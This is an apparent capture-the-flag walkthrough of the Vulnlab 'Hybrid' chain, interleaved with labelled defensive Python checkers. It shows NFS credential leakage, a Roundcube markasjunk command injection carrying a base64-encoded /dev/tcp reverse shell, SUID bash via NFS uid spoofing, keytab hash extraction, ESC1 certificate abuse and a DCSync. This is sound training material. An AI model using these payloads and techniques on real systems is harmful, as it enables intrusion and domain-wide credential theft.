Vulnlab - Hybrid (Chain) - Easy

Mail01.hybrid.vl
Initial Access
Let's first enumerate the machine with an nmap scan. The goal here is to retrieve as much information as we can:
nmap -sV -sC -p- -A --max-retries 2 -n -T4 10.10.240.230
Starting Nmap 7.93 ( https://nmap.org ) at 2024-12-21 02:31 CET
NSE Timing: About 97.19% done; ETC: 02:32 (0:00:00 remaining)
Nmap scan report for 10.10.240.230
Host is up (0.023s latency).
Not shown: 65520 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 60bc2226783cb4e06beaaa1ec1625dde (ECDSA)
|_ 256 a3b5d86106e63a418845e35203d2231b (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: mail01.hybrid.vl, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, AUTH PLAIN LOGIN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, CHUNKING
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Redirecting...
|_http-server-header: nginx/1.18.0 (Ubuntu)
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: RESP-CODES UIDL TOP SASL STLS CAPA AUTH-RESP-CODE PIPELINING
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mail01
| Subject Alternative Name: DNS:mail01
| Not valid before: 2023-06-17T13:20:17
|_Not valid after: 2033-06-14T13:20:17
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 40223/tcp mountd
| 100005 1,2,3 42464/udp mountd
| 100005 1,2,3 45045/udp6 mountd
| 100005 1,2,3 51159/tcp6 mountd
| 100021 1,3,4 40757/tcp nlockmgr
| 100021 1,3,4 43043/tcp6 nlockmgr
| 100021 1,3,4 43482/udp nlockmgr
| 100021 1,3,4 53344/udp6 nlockmgr
| 100024 1 34969/tcp status
| 100024 1 40381/udp6 status
| 100024 1 47130/udp status
| 100024 1 57021/tcp6 status
| 100227 3 2049/tcp nfs_acl
|_ 100227 3 2049/tcp6 nfs_acl
143/tcp open imap Dovecot imapd (Ubuntu)
|_imap-capabilities: more capabilities post-login OK listed have SASL-IR STARTTLS Pre-login LOGIN-REFERRALS ID IDLE LOGINDISABLEDA0001 IMAP4rev1 LITERAL+ ENABLE
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mail01
| Subject Alternative Name: DNS:mail01
| Not valid before: 2023-06-17T13:20:17
|_Not valid after: 2033-06-14T13:20:17
587/tcp open smtp Postfix smtpd
|_smtp-commands: mail01.hybrid.vl, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, AUTH PLAIN LOGIN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, CHUNKING
993/tcp open ssl/imap Dovecot imapd (Ubuntu)
|_ssl-date: TLS randomness does not represent time
|_imap-capabilities: more capabilities post-login OK listed have SASL-IR AUTH=PLAIN AUTH=LOGINA0001 LOGIN-REFERRALS ENABLE IDLE Pre-login IMAP4rev1 LITERAL+ ID
| ssl-cert: Subject: commonName=mail01
| Subject Alternative Name: DNS:mail01
| Not valid before: 2023-06-17T13:20:17
|_Not valid after: 2033-06-14T13:20:17
995/tcp open ssl/pop3 Dovecot pop3d
|_pop3-capabilities: RESP-CODES UIDL TOP SASL(PLAIN LOGIN) USER CAPA AUTH-RESP-CODE PIPELINING
| ssl-cert: Subject: commonName=mail01
| Subject Alternative Name: DNS:mail01
| Not valid before: 2023-06-17T13:20:17
|_Not valid after: 2033-06-14T13:20:17
|_ssl-date: TLS randomness does not represent time
2049/tcp open nfs_acl 3 (RPC #100227)
34969/tcp open status 1 (RPC #100024)
40223/tcp open mountd 1-3 (RPC #100005)
40757/tcp open nlockmgr 1-4 (RPC #100021)
51431/tcp open mountd 1-3 (RPC #100005)
53971/tcp open mountd 1-3 (RPC #100005)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=12/21%OT=22%CT=1%CU=38962%PV=Y%DS=2%DC=T%G=Y%TM=67661A
OS:E5%P=aarch64-unknown-linux-gnu)SEQ(SP=107%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%T
OS:S=A)OPS(O1=M4D4ST11NW7%O2=M4D4ST11NW7%O3=M4D4NNT11NW7%O4=M4D4ST11NW7%O5=
OS:M4D4ST11NW7%O6=M4D4ST11)WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F
OS:4B3)ECN(R=Y%DF=Y%T=40%W=F507%O=M4D4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A
OS:=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%
OS:Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=
OS:A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=
OS:Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%
OS:T=40%CD=S)
Network Distance: 2 hops
Service Info: Host: mail01.hybrid.vl; OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 5900/tcp)
HOP RTT ADDRESS
1 21.88 ms 10.8.0.1
2 22.02 ms 10.10.240.230
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 96.95 seconds
We are facing a mail server. We can see some pretty interesting services like HTTP and NFS, as well as SMTP, IMAP and POP3. I want to enumerate NFS first to see if there is any exported share that we can potentially mount:
showmount -e 10.10.240.230
Export list for 10.10.240.230:
/opt/share *
That looks promising! Let's see if we can mount it on our attacking machine:
sudo mount -t nfs 10.10.240.230:/opt/share ./nfs -o nolock
That works. In this shared folder there is a file named backup.tar.gz, so we extract it:
tar -xvf backup.tar.gz
etc/passwd
etc/sssd/sssd.conf
etc/dovecot/dovecot-users
etc/postfix/main.cf
opt/certs/hybrid.vl/fullchain.pem
opt/certs/hybrid.vl/privkey.pem
Dovecot is the IMAP/POP3 server, and the archive contains a file named dovecot-users listing two users with their passwords stored in plain text:
cat dovecot-users
admin@hybrid.vl:{plain}REDACTED
peter.turner@hybrid.vl:{plain}REDACTED
Roundcube is a webmail client, and it is reachable on port 80.
If we try to log in with the credentials discovered previously in the dovecot-users file, it works!
From here, I found nothing to abuse. I decided to enumerate the version of Roundcube to see if there was a CVE available. There was none for Roundcube itself, but there was one for the markasjunk plugin.
I really recommend reading the article, it's really interesting. To summarise it: it is possible to perform command injection directly through the email address of the identity.
Before trying to gain a reverse shell directly, we first check whether our command gets executed at all. For this test we can simply start a web server and use curl or wget as the injected command. Let's modify our email identity:
The next step is to send an email (to ourselves, for example) and then mark the mail as junk. If you follow these steps, you'll receive a connection on the web server, meaning that our command injection is working!
python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.240.230 - - [21/Dec/2024 03:42:06] "GET / HTTP/1.1" 200 -
It's time to craft our payload! I was not able to directly execute a command to gain a reverse shell because the web application rejects certain characters like " or >. I also tried to URL-encode the command, but it did not work, so the last option was to base64-encode the command:
echo "sh -i >& /dev/tcp/10.8.2.242/443 0>&1" | base64
c2ggLWkgPiYgL2Rldi90Y3AvMTAuOC4yLjI0Mi80NDMgMD4mMQo=
The final payload is the following:
admin&echo${IFS}'c2ggLWkgPiYgL2Rldi90Y3AvMTAuOC4yLjI0Mi80NDMgMD4mMQ=='${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash&@hybrid.vl
- We use echo to print out the base64-encoded command.
- We use ${IFS} in place of space characters, which are rejected.
- We pipe the output into base64 -d to decode our command.
- We pipe the decoded command into bash to execute it and obtain our reverse shell.
If we repeat the steps as we did previously (modify the identity with this payload, send an email and mark it as junk), we should obtain a reverse shell:
pwncat-cs :443
[04:18:28] Welcome to pwncat 🐈! __main__.py:164
[04:18:33] received connection from 10.10.239.214:56682 bind.py:84
[04:18:34] 0.0.0.0:443: upgrading from /usr/bin/dash to /usr/bin/bash manager.py:957
[04:18:35] 10.10.239.214:56682: registered new host w/ db manager.py:957
(local) pwncat$
(remote) www-data@mail01:/var/www/roundcube$
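The root cause above is an identity email address being pasted into a shell command. As an added example (not Roundcube's or the plugin's code), this shows the two defensive halves: a strict shape check that rejects anything containing shell metacharacters such as &, | or ${IFS}, and a command builder that quotes every argument so no token can become a second command. The sa-learn command shape and the sample identities are constructed assumptions for illustration.

```python
"""Hardened identity handling for the markasjunk-style injection (added example)."""
import re
import shlex

# Strict shape for an identity email: local part, '@', dotted domain. Anything
# with shell metacharacters, whitespace, quotes or '${IFS}' fails outright.
PLAIN_ADDRESS = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+$")


def is_plain_address(identity):
    """True only for a bare address with no shell-significant characters."""
    return bool(PLAIN_ADDRESS.fullmatch(identity))


def build_learn_command(identity, message_path):
    """Return a shell command string with every argument quoted.

    Hypothetical command shape for illustration, not the plugin's own.
    """
    if not is_plain_address(identity):
        raise ValueError(f"rejected identity: {identity!r}")
    # shlex.quote makes each value a single token: '&', '|' or ${IFS} inside a
    # value can no longer split the line into a second command.
    return " ".join(["sa-learn", "--spam", "-u",
                     shlex.quote(identity), shlex.quote(message_path)])


def suspicious_identities(identities):
    """Detection over stored identities: flag anything that is not a plain address."""
    return [i for i in identities if not is_plain_address(i)]


# Constructed sample set: two legitimate identities plus an injected one in the
# same shape as the walkthrough's payload (harmless base64 body 'Zm9v' = 'foo').
SAMPLE_IDENTITIES = [
    "admin@hybrid.vl",
    "peter.turner@hybrid.vl",
    "admin&echo${IFS}Zm9v${IFS}|${IFS}base64${IFS}-d&@hybrid.vl",
]

if __name__ == "__main__":
    for flagged in suspicious_identities(SAMPLE_IDENTITIES):
        print("suspicious identity:", flagged)
    print(build_learn_command("admin@hybrid.vl", "/tmp/msg.eml"))
```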
Lateral Movement
I want to be honest: this part was too tricky for me, so I needed to ask for help. I'll explain how it works, but keep in mind I didn't find it by myself.
To find the attack path, we first need to take a look at the NFS export configuration:
cat etc/exports
# /etc/exports: the access control list for filesystems which may be exported
# to NFS clients. See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4 gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes gss/krb5i(rw,sync,no_subtree_check)
#
/opt/share *(rw,no_subtree_check)
The important thing to note here is that any host has read and write permission on the share. Because the server trusts the uid sent by the NFS client, this lets us impersonate the uid of the user peter.turner@hybrid.vl. We first need to grab his uid:
id peter.turner@hybrid.vl
uid=902601108(peter.turner@hybrid.vl) gid=902600513(domain users@hybrid.vl) groups=902600513(domain users@hybrid.vl),902601104(hybridusers@hybrid.vl)
On our attacking machine, we need to create a user with the same name and the same uid:
useradd -u 902601108 peter.turner@hybrid.vl
From the victim machine, we copy /bin/bash into the NFS share so that we can grab it from our attacking machine:
www-data@mail01:/opt/share$ cp /bin/bash .
On our attacking machine, we switch to the peter user and copy the file anywhere on our machine. The goal is to make Peter the owner of the file:
$ ls -la bash
-rwxr-xr-x 1 peter.turner@hybrid.vl peter.turner@hybrid.vl 1396520 21 déc. 04:57 bash
Then we copy bash back into the NFS share and set the SUID bit with chmod. With that bit set, whoever runs this bash gets the effective uid of the file's owner, Peter:
$ cp bash /home/nfs/.
$ chmod +s /home/nfs/bash
Now, if we run this bash as www-data, we get Peter's effective uid and are able to access his home folder:
www-data@mail01:/opt/share$ /opt/share/bash -p
www-data@mail01:/opt/share$ id
uid=33(www-data) gid=33(www-data) euid=902601108(peter.turner@hybrid.vl) egid=1001 groups=1001,33(www-data)
www-data@mail01:/home/peter.turner@hybrid.vl$ ls -la
total 36
drwx------ 4 peter.turner@hybrid.vl domain users@hybrid.vl 4096 Jun 18 2023 .
drwxr-xr-x 3 root root 4096 Jun 17 2023 ..
lrwxrwxrwx 1 peter.turner@hybrid.vl domain users@hybrid.vl 9 Jun 17 2023 .bash_history -> /dev/null
-rw------- 1 peter.turner@hybrid.vl domain users@hybrid.vl 220 Jun 17 2023 .bash_logout
-rw------- 1 peter.turner@hybrid.vl domain users@hybrid.vl 3771 Jun 17 2023 .bashrc
drwx------ 2 peter.turner@hybrid.vl domain users@hybrid.vl 4096 Jun 17 2023 .cache
lrwxrwxrwx 1 peter.turner@hybrid.vl domain users@hybrid.vl 9 Jun 18 2023 .kpcli-history -> /dev/null
drwxr-xr-x 3 peter.turner@hybrid.vl domain users@hybrid.vl 4096 Jun 17 2023 .local
-rw------- 1 peter.turner@hybrid.vl domain users@hybrid.vl 807 Jun 17 2023 .profile
-rw-r--r-- 1 peter.turner@hybrid.vl domain users@hybrid.vl 37 Jun 17 2023 flag.txt
-rw-r--r-- 1 peter.turner@hybrid.vl domain users@hybrid.vl 1678 Jun 18 2023 passwords.kdbx
Note
Let's make a quick recap:
- We created a user on our attacking machine with the same name and the same uid as Peter.
- We copied bash into the shared folder from the victim machine.
- From our attacking machine, we copied bash as Peter so that he becomes the owner, and once done we copied it back into the shared folder.
- We set the SUID bit with chmod, which permitted us to execute bash in the context of the owner.
What an amazing abuse! I recommend you remember it.
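The export line that made this possible is /opt/share *(rw,no_subtree_check): world-writable, and without all_squash the server keeps whatever uid the client claims. As an added example (not part of the original walkthrough), this is a small auditor for /etc/exports that flags those conditions; the sample file is constructed and pairs the walkthrough's line with a hardened variant. Note that all_squash stops the forged-owner trick but not SUID execution in general, so the server-side filesystem holding the share should additionally be mounted nosuid.

```python
"""Audit /etc/exports for the weaknesses abused above (added example)."""
import re

# Constructed sample: the walkthrough's export plus two variants for comparison.
SAMPLE_EXPORTS = """\
# /etc/exports: the access control list for filesystems which may be exported
/opt/share *(rw,no_subtree_check)
/opt/share 10.10.240.0/24(rw,no_subtree_check,all_squash,anonuid=65534,anongid=65534)
/srv/ro *(ro,no_subtree_check)
"""

SPEC_RE = re.compile(r"^([^(]+)(?:\((.*)\))?$")


def parse_exports(text):
    """Yield (path, client, options) for each client spec on each export line."""
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()  # drop comments and blanks
        if not line:
            continue
        parts = line.split(None, 1)
        if len(parts) == 1:  # exports(5): no client means every host
            yield parts[0], "*", []
            continue
        path, rest = parts
        for spec in rest.split():
            m = SPEC_RE.match(spec)
            client = m.group(1)
            opts = [o.strip() for o in (m.group(2) or "").split(",") if o.strip()]
            yield path, client, opts


def audit_export(path, client, opts):
    """Return a list of findings for one (path, client, options) triple."""
    findings = []
    writable = "rw" in opts
    if client == "*":
        findings.append("exported to every host ('*')")
    if writable and "all_squash" not in opts:
        # Without all_squash the server trusts the client's uid/gid, so a client
        # that forges a uid creates files owned by that uid on the server.
        findings.append("rw without all_squash: client-supplied uids are trusted")
    if writable and "no_root_squash" in opts:
        findings.append("no_root_squash: remote root writes as local root")
    return findings


def audit_exports(text):
    """Map 'path client' -> findings for every export spec in the file."""
    return {f"{path} {client}": audit_export(path, client, opts)
            for path, client, opts in parse_exports(text)}


if __name__ == "__main__":
    for export, findings in audit_exports(SAMPLE_EXPORTS).items():
        print(export, "->", findings or "ok")
```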
Privilege Escalation
In Peter's home folder we find a KeePass database; let's copy it to our attacking machine. Remember that we found credentials in the dovecot-users file. If we use Peter's password from there, we can open the database and find credentials for peter.turner:
With this credential, we can connect through SSH to mail01:
ssh peter.turner@hybrid.vl@10.10.239.214
(peter.turner@hybrid.vl@10.10.239.214) Password:
Welcome to Ubuntu 22.04.2 LTS (GNU/Linux 5.15.0-75-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sat Dec 21 04:59:10 AM UTC 2024
System load: 0.0 Processes: 147
Usage of /: 65.3% of 6.06GB Users logged in: 0
Memory usage: 33% IPv4 address for ens5: 10.10.239.214
Swap usage: 0%
=> There is 1 zombie process.
* Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
just raised the bar for easy, resilient and secure K8s cluster deployment.
https://ubuntu.com/engage/secure-kubernetes-at-the-edge
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
3 additional security updates can be applied with ESM Apps.
Learn more about enabling ESM Apps service at https://ubuntu.com/esm
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Sat Dec 21 04:59:11 2024 from 10.8.2.242
peter.turner@hybrid.vl@mail01:~$
If we run a basic sudo -l, we can see that we are able to execute anything with sudo:
peter.turner@hybrid.vl@mail01:~$ sudo -l
[sudo] password for peter.turner@hybrid.vl:
Matching Defaults entries for peter.turner@hybrid.vl on mail01:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User peter.turner@hybrid.vl may run the following commands on mail01:
(ALL) ALL
We can then become root on the machine:
peter.turner@hybrid.vl@mail01:~$ sudo /bin/bash -i
root@mail01:/home/peter.turner@hybrid.vl# id
uid=0(root) gid=0(root) groups=0(root)
DC01.hybrid.vl
Initial enumeration
Since we own a domain user, let's run RustHound to collect data from the DC and feed it to BloodHound:
rusthound -d "hybrid.vl" -u "peter.turner"@"hybrid.vl" -p "REDACTED" --zip --ldaps --adcs --old-bloodhound
---------------------------------------------------
Initializing RustHound at 05:28:05 on 12/21/24
Powered by g0h4n from OpenCyber
---------------------------------------------------
[2024-12-21T04:28:05Z INFO rusthound] Verbosity level: Info
[2024-12-21T04:28:05Z INFO rusthound::ldap] Connected to HYBRID.VL Active Directory!
[2024-12-21T04:28:05Z INFO rusthound::ldap] Starting data collection...
[2024-12-21T04:28:06Z INFO rusthound::ldap] All data collected for NamingContext DC=hybrid,DC=vl
[2024-12-21T04:28:06Z INFO rusthound::ldap] All data collected for NamingContext CN=Configuration,DC=hybrid,DC=vl
[2024-12-21T04:28:06Z INFO rusthound::json::parser] Starting the LDAP objects parsing...
⢀ Parsing LDAP objects: 20% [2024-12-21T04:28:06Z INFO rusthound::modules::adcs::parser] Found 12 enabled certificate templates
[2024-12-21T04:28:06Z INFO rusthound::json::parser] Parsing LDAP objects finished!
[2024-12-21T04:28:06Z INFO rusthound::json::checker] Starting checker to replace some values...
[2024-12-21T04:28:06Z INFO rusthound::json::checker] Checking and replacing some values finished!
[2024-12-21T04:28:06Z INFO rusthound::modules] Starting checker for ADCS values...
[2024-12-21T04:30:17Z ERROR rusthound::modules::adcs::checker] Couldn't connect to server http://dc01.hybrid.vl/certsrv/, please try manually and check for https access if EPA is enable.
[2024-12-21T04:30:17Z INFO rusthound::modules] Checking for ADCS values finished!
[2024-12-21T04:30:17Z INFO rusthound::json::maker] 14 users parsed!
[2024-12-21T04:30:17Z INFO rusthound::json::maker] 61 groups parsed!
[2024-12-21T04:30:17Z INFO rusthound::json::maker] 2 computers parsed!
[2024-12-21T04:30:17Z INFO rusthound::json::maker] 2 ous parsed!
[2024-12-21T04:30:17Z INFO rusthound::json::maker] 1 domains parsed!
[2024-12-21T04:30:17Z INFO rusthound::json::maker] 1 cas parsed!
[2024-12-21T04:30:17Z INFO rusthound::json::maker] 34 templates parsed!
[2024-12-21T04:30:17Z INFO rusthound::json::maker] 2 gpos parsed!
[2024-12-21T04:30:17Z INFO rusthound::json::maker] 21 containers parsed!
[2024-12-21T04:30:17Z INFO rusthound::json::maker] .//20241221053017_hybrid-vl_rusthound.zip created!
Rusthound arguments
- -d: the domain
- -u: the user
- -p: the password
- --zip: tells rusthound that we want all the .json files in a zip
- --ldaps: use LDAPS instead of LDAP
- --adcs: enumerate certificate templates
- --old-bloodhound: make the data compatible with the legacy version of BloodHound
I found some templates, but nothing I could do with Peter. I then decided to use Certipy to find out whether there is any vulnerable template in the domain:
certipy find -vulnerable -u "peter.turner@hybrid.vl" -p "REDACTED"
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'hybrid-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'hybrid-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'hybrid-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'hybrid-DC01-CA'
[*] Saved BloodHound data to '20241221053557_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[*] Saved text output to '20241221053557_Certipy.txt'
[*] Saved JSON output to '20241221053557_Certipy.json'
Certipy arguments
- find: tells certipy we want to enumerate templates
- -vulnerable: tells certipy to only return the vulnerable templates it has found
- -u: the user used to enumerate
- -p: password of the user
Let's print out what certipy found:
cat 20241221053557_Certipy.json | jq
{
"Certificate Authorities": {
"0": {
"CA Name": "hybrid-DC01-CA",
"DNS Name": "dc01.hybrid.vl",
"Certificate Subject": "CN=hybrid-DC01-CA, DC=hybrid, DC=vl",
"Certificate Serial Number": "5C53FF4CA84C1F9C4A50351317ADBCB3",
"Certificate Validity Start": "2023-06-17 14:04:39+00:00",
"Certificate Validity End": "2124-12-21 03:14:07+00:00",
"Web Enrollment": "Disabled",
"User Specified SAN": "Disabled",
"Request Disposition": "Issue",
"Enforce Encryption for Requests": "Enabled",
"Permissions": {
"Owner": "HYBRID.VL\\Administrators",
"Access Rights": {
"2": [
"HYBRID.VL\\Administrators",
"HYBRID.VL\\Domain Admins",
"HYBRID.VL\\Enterprise Admins"
],
"1": [
"HYBRID.VL\\Administrators",
"HYBRID.VL\\Domain Admins",
"HYBRID.VL\\Enterprise Admins"
],
"512": [
"HYBRID.VL\\Authenticated Users"
]
}
}
}
},
"Certificate Templates": {
"0": {
"Template Name": "HybridComputers",
"Display Name": "HybridComputers",
"Certificate Authorities": [
"hybrid-DC01-CA"
],
"Enabled": true,
"Client Authentication": true,
"Enrollment Agent": false,
"Any Purpose": false,
"Enrollee Supplies Subject": true,
"Certificate Name Flag": [
"EnrolleeSuppliesSubject"
],
"Enrollment Flag": [
"None"
],
"Private Key Flag": [
"16842752"
],
"Extended Key Usage": [
"Client Authentication",
"Server Authentication"
],
"Requires Manager Approval": false,
"Requires Key Archival": false,
"Authorized Signatures Required": 0,
"Validity Period": "100 years",
"Renewal Period": "6 weeks",
"Minimum RSA Key Length": 4096,
"Permissions": {
"Enrollment Permissions": {
"Enrollment Rights": [
"HYBRID.VL\\Domain Admins",
"HYBRID.VL\\Domain Computers",
"HYBRID.VL\\Enterprise Admins"
]
},
"Object Control Permissions": {
"Owner": "HYBRID.VL\\Administrator",
"Write Owner Principals": [
"HYBRID.VL\\Domain Admins",
"HYBRID.VL\\Enterprise Admins",
"HYBRID.VL\\Administrator"
],
"Write Dacl Principals": [
"HYBRID.VL\\Domain Admins",
"HYBRID.VL\\Enterprise Admins",
"HYBRID.VL\\Administrator"
],
"Write Property Principals": [
"HYBRID.VL\\Domain Admins",
"HYBRID.VL\\Enterprise Admins",
"HYBRID.VL\\Administrator"
]
}
},
"[!] Vulnerabilities": {
"ESC1": "'HYBRID.VL\\\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication"
}
}
}
}
It seems that if we get hold of a computer account, we can abuse this ESC1 template and impersonate any UPN we want, because Domain Computers can enroll, the enrollee supplies the subject, and the certificate is valid for client authentication.
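The ESC1 verdict above comes from Certipy's own checker. As an added example (not Certipy's code), this re-implements the ESC1 conditions over Certipy's JSON output so the logic can be read and re-run against an export: the template must be enabled, require no manager approval and no authorized signatures, let the enrollee supply the subject, allow client authentication (or any purpose), and grant enrollment to a principal outside the privileged groups. The embedded JSON is a constructed, trimmed copy of the HybridComputers entry plus a hypothetical "HybridComputers-Fixed" variant with manager approval turned on.

```python
"""Check Certipy 'find' JSON for the ESC1 conditions (added example)."""
import json

# Principals treated as privileged; enrollment by anyone else is a finding.
PRIVILEGED_SUFFIXES = ("\\Domain Admins", "\\Enterprise Admins",
                       "\\Administrators", "\\Administrator")

# Constructed sample in the field layout of Certipy's JSON output.
SAMPLE_CERTIPY_JSON = r"""
{
  "Certificate Templates": {
    "0": {
      "Template Name": "HybridComputers",
      "Enabled": true,
      "Client Authentication": true,
      "Any Purpose": false,
      "Enrollee Supplies Subject": true,
      "Requires Manager Approval": false,
      "Authorized Signatures Required": 0,
      "Permissions": {"Enrollment Permissions": {"Enrollment Rights": [
        "HYBRID.VL\\Domain Admins", "HYBRID.VL\\Domain Computers",
        "HYBRID.VL\\Enterprise Admins"]}}
    },
    "1": {
      "Template Name": "HybridComputers-Fixed",
      "Enabled": true,
      "Client Authentication": true,
      "Any Purpose": false,
      "Enrollee Supplies Subject": true,
      "Requires Manager Approval": true,
      "Authorized Signatures Required": 0,
      "Permissions": {"Enrollment Permissions": {"Enrollment Rights": [
        "HYBRID.VL\\Domain Admins", "HYBRID.VL\\Domain Computers",
        "HYBRID.VL\\Enterprise Admins"]}}
    }
  }
}
"""


def low_priv_enrollers(template):
    """Enrollment principals that are not in the privileged allow-list."""
    rights = (template.get("Permissions", {})
              .get("Enrollment Permissions", {})
              .get("Enrollment Rights", []))
    return [p for p in rights if not p.endswith(PRIVILEGED_SUFFIXES)]


def check_esc1(template):
    """Return the ESC1 finding string for one template dict, or None."""
    if not template.get("Enabled"):
        return None
    if template.get("Requires Manager Approval"):
        return None  # a human gate blocks self-service issuance
    if template.get("Authorized Signatures Required", 0) > 0:
        return None  # needs an enrollment agent co-signature
    if not template.get("Enrollee Supplies Subject"):
        return None  # requester cannot choose the UPN
    if not (template.get("Client Authentication") or template.get("Any Purpose")):
        return None  # certificate unusable for logon
    enrollers = low_priv_enrollers(template)
    if not enrollers:
        return None
    return (f"ESC1: {', '.join(enrollers)} can enroll, enrollee supplies "
            "subject and template allows client authentication")


def esc1_report(certipy_json_text):
    """Map template name -> ESC1 finding (or None) for every template."""
    data = json.loads(certipy_json_text)
    return {t["Template Name"]: check_esc1(t)
            for t in data.get("Certificate Templates", {}).values()}
```

Remediation follows directly from whichever condition you choose to break: require manager approval, clear EnrolleeSuppliesSubject, or restrict enrollment rights to administrators.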
Path to Domain Admins
On Linux machines joined to the domain, the information needed to authenticate through Kerberos is stored in keytab files. These files contain several pieces of information such as the realm, the service principal and even the NTLM hash. We can find a keytab file on Mail01.hybrid.vl:
root@mail01:/etc# ls -la | grep .keytab
-rw------- 1 root root 650 Jun 17 2023 krb5.keytab
To extract the information stored in this file, we can use this tool:
python keytabextract.py ../krb5.keytab
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
REALM : HYBRID.VL
SERVICE PRINCIPAL : MAIL01$/
NTLM HASH : REDACTED
AES-256 HASH : REDACTED
AES-128 HASH : REDACTED
With the NTLM hash of the Mail01.hybrid.vl computer account in hand, we can use certipy to request a certificate and impersonate any UPN we want:
certipy req -u 'mail01$@hybrid.vl' -hashes :"REDACTED" -dc-ip "10.10.239.213" -target "dc01.hybrid.vl" -ca "hybrid-DC01-CA" -template "HybridComputers" -upn 'dc01$@hybrid.vl' -debug -key-size 4096
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[+] Trying to resolve 'dc01.hybrid.vl' at '10.10.239.213'
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:10.10.239.213[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.10.239.213[\pipe\cert]
[*] Successfully requested certificate
[*] Request ID is 15
[*] Got certificate with UPN 'dc01$@hybrid.vl'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'dc01.pfx'
Certipy arguments
- req: tells certipy that we are going to make a request to the CA
- -u: here we use the computer account, mail01$
- -hashes: this option allows us to authenticate with the NTLM hash
- -dc-ip: the IP of the domain controller
- -target: the FQDN of the domain controller
- -ca: the Certificate Authority
- -template: the template we want to request a certificate from
- -upn: the UPN we want to impersonate
- -key-size: the length of the key; this value can be found in the certipy output when we enumerated the templates
Once done, we can use Certipy again to retrieve the hash of the account:
certipy auth -pfx "dc01.pfx" -dc-ip '10.10.239.213' -username 'DC01$' -domain 'hybrid.vl'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: dc01$@hybrid.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'dc01.ccache'
[*] Trying to retrieve NT hash for 'dc01$'
[*] Got hash for 'dc01$@hybrid.vl': REDACTED:REDACTED
We can then perform a DCSync attack to retrieve the hash and AES keys of any account in the domain:
secretsdump -just-dc-user Administrator -hashes :"REDACTED" "hybrid.vl"/"DC01$"@"10.10.239.213"
Impacket v0.13.0.dev0+20241024.220713.de4ad10d - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
